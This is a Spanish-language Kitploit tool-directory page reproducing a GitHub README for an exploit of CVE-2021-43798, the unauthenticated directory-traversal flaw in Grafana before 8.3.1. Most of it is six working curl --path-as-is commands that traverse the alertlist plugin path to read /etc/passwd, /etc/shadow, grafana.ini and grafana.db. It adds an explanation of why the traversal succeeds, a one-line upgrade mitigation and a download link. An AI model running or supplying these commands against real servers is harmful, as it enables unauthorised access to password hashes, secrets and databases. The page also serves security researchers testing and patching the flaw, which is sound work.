Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-43798 — Exploit para CVE-2021-43798, una vulnerabilidad de recorrido de directorios en Grafana, que permite la lectura arbitraria de archivos sin autenticación mediante comandos curl manipulados. | Kitploit
Herramientas/GitHubGitHub/malekalthubiany/cve-2021-43798
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubmalekalthubiany/cve-2021-43798

CVE-2021-43798

Exploit para CVE-2021-43798, una vulnerabilidad de recorrido de directorios en Grafana, que permite la lectura arbitraria de archivos sin autenticación mediante comandos curl manipulados.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 2 añosAún no revisado

Exploit de Grafana CVE-2021-43798

Resumen

Este repositorio demuestra la explotación de CVE-2021-43798, una vulnerabilidad de directory traversal en Grafana. Esta vulnerabilidad permite a los atacantes leer archivos arbitrarios en el servidor.

Detalles del CVE

  • CVE: CVE-2021-43798
  • Descripción: Vulnerabilidad de directory traversal en versiones de Grafana anteriores a 8.3.1.
  • Impacto: Permite a atacantes no autenticados leer archivos arbitrarios en el servidor.

Requisitos previos

  • Una versión vulnerable de Grafana en ejecución (anterior a 8.3.1)
  • Acceso a la instancia de Grafana objetivo

Explotación

Usando curl

Para explotar la vulnerabilidad manualmente, puedes usar uno de los siguientes comandos curl para intentar leer archivos sensibles:

root@kitploit:~
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"

¿Por qué --path-as-is?

En el contexto de explotar la vulnerabilidad de directory traversal de Grafana CVE-2021-43798, la opción --path-as-is es esencial porque permite que las secuencias de traversal especialmente diseñadas (../../../../../) se envíen directamente al servidor sin modificación. Esto puede llevar a acceder a archivos sensibles en el servidor que están fuera del directorio previsto.

Sin --path-as-is, curl podría normalizar la ruta a algo como /public/plugins/Users/install.txt, lo que no explotaría la vulnerabilidad. Al usar --path-as-is, la secuencia de traversal exacta se conserva, permitiendo que el exploit tenga éxito.

Referencia de documentación

Puedes encontrar más detalles sobre la opción --path-as-is en la documentación de curl. Al comprender y utilizar --path-as-is, los profesionales de seguridad e investigadores pueden demostrar y probar eficazmente las vulnerabilidades de directory traversal en aplicaciones web.

Mitigación

Para mitigar esta vulnerabilidad, actualiza Grafana a la versión 8.3.1 o posterior.

Descargar herramienta